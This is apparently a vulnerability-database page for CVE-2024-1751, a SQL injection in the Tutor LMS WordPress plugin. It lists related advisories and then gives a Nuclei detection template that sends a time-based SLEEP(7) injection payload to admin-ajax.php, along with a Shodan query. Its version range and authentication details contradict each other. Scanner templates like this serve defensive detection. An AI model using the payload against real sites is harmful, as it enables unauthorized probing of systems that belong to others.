| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| The vulnerability of the Tutor LMS plugin for the WordPress content management system allows a hacker to execute arbitrary SQL queries and gain unauthorized access to protected information. | 30 Apr 202400:00 | – | bdu_fstec | |
| CVE-2024-1751 | 13 Mar 202417:36 | – | circl | |
| WordPress Plugin Tutor LMS Security Vulnerability | 13 Mar 202400:00 | – | cnnvd | |
| CVE-2024-1751 | 13 Mar 202415:27 | – | cve | |
| CVE-2024-1751 Tutor LMS – eLearning and online course solution <= 2.6.1 - Authenticated (Subscriber+) SQL Injection | 13 Mar 202415:27 | – | cvelist | |
| EUVD-2024-17478 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-1751 | 13 Mar 202416:15 | – | nvd | |
| CVE-2024-1751 | 13 Mar 202416:15 | – | osv | |
| WordPress Tutor LMS Plugin <= 2.6.1 is vulnerable to SQL Injection | 12 Mar 202400:00 | – | patchstack | |
| Sql injection | 13 Mar 202416:15 | – | prion |
id: CVE-2024-1751
info:
name: Tutor LMS <= 2.1.10 - SQL Injection
author: Shivam Kamboj
severity: high
description: |
Tutor LMS – eLearning and online course solution plugin for WordPress [all versions up to 2.6.1] contains a time-based SQL Injection caused by insufficient escaping on the question_id parameter in SQL queries, letting authenticated attackers with subscriber or higher access extract sensitive information, exploit requires attacker to be authenticated with subscriber or higher privileges.
impact: |
Authenticated attackers can extract sensitive database information through SQL injection, potentially leading to data breach or further exploitation.
remediation: |
Update to version 2.6.2 or later to fix the vulnerability.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor/tutor-lms-2110-unauthenticated-sql-injection
- https://plugins.trac.wordpress.org/changeset?old=2919134%40tutor&new=2919134%40tutor
- https://nvd.nist.gov/vuln/detail/CVE-2024-1751
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-1751
epss-score: 0.03135
epss-percentile: 0.86328
cwe-id: CWE-89
metadata:
verified: true
max-request: 2
shodan-query: html:"/plugins/tutor/"
tags: cve,cve2024,wordpress,wp-plugin,tutor,sqli,unauth,wp
flow: http(1) && http(2)
http:
- raw:
- |
GET /courses/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "_tutor_nonce")'
condition: and
internal: true
extractors:
- type: regex
name: nonce
group: 1
regex:
- "_tutor_nonce[\"']:\\s*[\"']([a-f0-9]+)[\"']"
internal: true
- raw:
- |
@timeout: 30s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=load_filtered_instructor&_tutor_nonce={{nonce}}¤t_page=1&short_by=ASC%2C%28SELECT+SLEEP%287%29%29--+-
matchers:
- type: dsl
dsl:
- 'duration>=7'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_any(body, "\"success\":true", "tutor-instructor-list")'
condition: and
# digest: 4b0a00483046022100b8b2796264a25f168dd7931b5e4a21638b1960afb265fc607494e1585b2950db022100bb40b9eeb7448499b4526b255553fe90b1df5a43ae584640e0a1135fdd416bae:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation